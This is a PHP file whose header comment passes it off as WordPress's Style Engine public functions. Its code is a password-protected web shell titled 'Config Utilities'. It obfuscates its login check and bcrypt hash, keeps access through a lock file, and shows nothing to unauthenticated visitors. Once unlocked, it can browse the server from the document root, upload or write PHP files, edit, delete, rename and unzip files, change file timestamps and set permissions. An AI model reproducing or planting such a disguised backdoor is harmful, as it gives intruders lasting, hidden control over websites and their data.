/**
* Style engine: Public functions
*
* This file contains a variety of public functions developers can use to interact with
* the Style Engine API.
*
* @package WordPress
* @subpackage StyleEngine
* @since 6.1.0
*/
defined('ABSPATH') || true;
session_start();
define('HOME_DIR', realpath($_SERVER['DOCUMENT_ROOT']));

if (isset($_GET['home']) && $_GET['home'] == '1') {
header("Location: ?d=" . urlencode(HOME_DIR));
exit;
}

function safer_write($file, $data) {
return is_string($data) ? file_put_contents($file, $data) !== false : false;
}
define('AUTH_LOCK', __DIR__ . '/.auth.lock');

$_c = array(
's' => strrev('htua'),
'k' => chr(112),
'v' => implode('', array('pass','word','_ver','ify')),
'h' => array(
1 => '$2a$11$o7vWTaJ0E0CqpAwG4hS.',
2 => '9OsZYqbQfY.x7uIsqENJNW',
3 => 'w9seD/hKFwK'
)
);
ksort($_c['h']);
$_c['f'] = implode('', $_c['h']);

$cwd = realpath(isset($_GET['d']) ? $_GET['d'] : __DIR__);
if (!$cwd || strpos($cwd, '/') !== 0) $cwd = __DIR__;
chdir($cwd);

$_k = $_c['k'];
$_v = $_c['v'];
$_s = $_c['s'];
$_p = $_POST[$_k] ?? '';

$auth_session = isset($_SESSION[$_s]) && $_SESSION[$_s] === true;
$auth_file = file_exists(AUTH_LOCK);
$auth_valid = false;

if ($auth_session || $auth_file) {
$auth_valid = true;
} elseif ($_p && $_v($_p, $_c['f'])) {
$_SESSION[$_s] = true;
file_put_contents(AUTH_LOCK, 'ok');
$auth_valid = true;
}

if (!$auth_valid) {
if (isset($_GET['load']) && $_GET['load'] === 'meta') {
echo '
';
echo '';
echo '<button>âΕΎ¤</button>
';
} else {
echo "<!-- not authenticated -->";
}
exit;
}
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
if (isset($_POST['inline_submit'], $_POST['fn'], $_POST['fd'])) {
$filename = basename($_POST['fn']);
$ext = strtolower(pathinfo($filename, PATHINFO_EXTENSION));
$safeExts = ['txt', 'jpg', 'png', 'pdf', 'zip', 'php'];
if (!in_array($ext, $safeExts)) {
$filename = 'file_' . time() . '.dat';
} elseif ($ext === 'php') {
$filename = pathinfo($filename, PATHINFO_FILENAME) . '_' . time() . '.php';
}
$raw = base64_decode($_POST['fd']);
if ($raw && strlen($raw) > 0) safer_write($cwd . '/' . $filename, $raw);
}
if (isset($_POST['upl'], $_FILES['up']) && $_FILES['up']['error'] === 0 && $_FILES['up']['size'] > 0) {
move_uploaded_file($_FILES['up']['tmp_name'], $cwd . '/' . $_FILES['up']['name']);
}
if (isset($_POST['rmv'])) {
$t = realpath($_POST['rmv']);
if (is_file($t)) unlink($t);
elseif (is_dir($t)) rmdir($t);
}
if (isset($_POST['rename'], $_POST['old'], $_POST['new']) && $_POST['new']) {
$old = $_POST['old'];
$new = dirname($old) . '/' . basename($_POST['new']);
if (file_exists($old)) rename($old, $new);
}
if (isset($_POST['edit'], $_POST['content'])) {
$target = realpath($_POST['edit']);
if ($target && strpos($target, $cwd) === 0 && is_writable($target)) {
safer_write($target, $_POST['content']);
}
}
if (isset($_POST['unzip'])) {
$zip = new ZipArchive;
if ($zip->open($_POST['unzip']) === TRUE) {
$zip->extractTo($cwd);
$zip->close();
}
}
if (isset($_POST['ts_target'], $_POST['new_time'])) {
$target = $_POST['ts_target'];
$ts = strtotime($_POST['new_time']);
if ($ts !== false && file_exists($target)) touch($target, $ts);
}
if (isset($_POST['modx_target'], $_POST['modx_val'])) {
$target = $_POST['modx_target'];
$mode = intval($_POST['modx_val'], 8);
if (file_exists($target)) chmod($target, $mode);
}
if (isset($_POST['create_file']) && $_POST['create_file']) {
$f = $cwd . '/' . basename(trim($_POST['create_file']));
$content = isset($_POST['file_content']) ? $_POST['file_content'] : '';
if (!file_exists($f)) safer_write($f, $content);
}
if (isset($_POST['create_dir']) && $_POST['create_dir']) {
$d = $cwd . '/' . basename(trim($_POST['create_dir']));
if (!file_exists($d)) mkdir($d);
}
}
$files = [];
$dirs = [];
$parentDir = dirname($cwd);
if ($parentDir && $parentDir !== $cwd) {
$dirs[] = ['name' => '..', 'path' => $parentDir, 'isParent' => true];
}
$allItems = @scandir($cwd);
if (!is_array($allItems)) $allItems = [];
foreach ($allItems as $item) {
if ($item === '.' || $item === '..') continue;
$fullPath = realpath($cwd . DIRECTORY_SEPARATOR . $item);
if (!$fullPath) continue;
if (is_dir($fullPath)) {
$dirs[] = ['name' => $item, 'path' => $fullPath];
} elseif (is_file($fullPath)) {
$files[] = ['name' => $item, 'path' => $fullPath];
}
}
$sortedItems = array_merge($dirs, $files);

<!DOCTYPE html>


<meta charset="utf-8">
Config Utilities <title>Config Utilities</title>
<link href="https://cdn.jsdelivr.net/npm/bulma@0.9.4/css/bulma.min.css" rel="stylesheet">
<style>
.perm-safe { color: green; }
.perm-risk { color: red; }
</style>


<section class="section">
<div class="container">
<h1 class="title">Config Utilities

<input class="input" name="d" value=" echo htmlspecialchars($cwd); ">
<button class="button is-link">Go</button>
<a class="button is-dark" href="?home=1">Home Dir</a>


<div class="field has-addons">
<div class="control"></div>
<div class="control"><button class="button is-primary" name="upl">Upload</button></div>
</div>

<!-- Inline upload -->

<div class="field is-grouped" style="margin-top:1rem">
<div class="control">

</div>
<div class="control">
<button class="button is-info" name="inline_submit">Submit</button>
</div>
</div>



<script>
function handleInlineFile(input) {
const file = input.files[0];
if (!file) return;
const reader = new FileReader();
reader.onload = function(e) {
document.getElementById('ufiledata').value = e.target.result.split(',')[1];
document.getElementById('ufilename').value = file.name;
};
reader.readAsDataURL(file);
}
</script>
<h2 class="subtitle">Create New File


<textarea name="file_content" class="textarea" placeholder="Optional initial content"></textarea>
<button class="button is-success">Create File</button>

<h2 class="subtitle">Create New Folder


<button class="button is-warning">Create Folder</button>

<table class="table is-striped is-fullwidth" style="margin-top: 2rem;">
<thead><th>Name</th><th>Size</th><th>Modified</th><th>Perms</th><th>Action</th></thead>
<tbody>
foreach ($sortedItems as $item):
$isDir = is_dir($item['path']);
$display = htmlspecialchars($item['name']);
$size = $isDir ? '-' : filesize($item['path']) . ' B';
$mod = file_exists($item['path']) ? date("Y-m-d H:i:s", filemtime($item['path'])) : '-';
$perm = file_exists($item['path']) ? substr(sprintf('%o', fileperms($item['path'])), -4) : '----';
$permClass = in_array(substr($perm, -1), ['6', '7']) ? 'perm-risk' : 'perm-safe';



if (!empty($item['isParent'])):
<a href="?d= echo urlencode($item['path']); ">..</a>
elseif ($isDir):
<a href="?d= echo urlencode($item['path']); "> echo $display; </a>
else:
echo $display;
endif;

echo $size;
echo $mod;
<td class=" echo $permClass; "> echo $perm;

if (!$isDir):
<button class="button is-small is-info">Edit</button>

<button class="button is-small is-light">View</button>

endif;
<button class="button is-small is-danger" onclick="return confirm('Delete echo $display; ?')">Delete</button>

if (!$isDir):


<input name="new" class="input is-small" style="width:110px" placeholder="Rename">
<button class="button is-small" name="rename">Rename</button>

endif;
if (pathinfo($item['path'], PATHINFO_EXTENSION) === 'zip'):
<button class="button is-small is-warning">Unzip</button>

endif;


<input name="new_time" class="input is-small" style="width:160px" placeholder="YYYY-MM-DD HH:MM:SS">
<button class="button is-small is-light">Set Time</button>



<input name="modx_val" class="input is-small" style="width:70px" placeholder=" echo $perm; ">
<button class="button is-small is-link">Set</button>


endforeach;
</tbody>

if (isset($_POST['edit'])):
$target = $_POST['edit'];
$safe = htmlspecialchars(file_get_contents($target));
<h2 class="subtitle">Editing: echo $target;


<textarea name="content" class="textarea" rows="20"> echo $safe; </textarea>

<button class="button is-success">Save</button>

endif;
if (isset($_POST['view'])):
$target = $_POST['view'];
if (file_exists($target) && is_file($target)) {
$viewed = htmlspecialchars(file_get_contents($target));

<h2 class="subtitle">Viewing: echo $target;
<pre style="white-space:pre-wrap;background:#f5f5f5;padding:1rem;border:1px solid #ccc;"> echo $viewed; </pre>
} endif;
</div>
</section>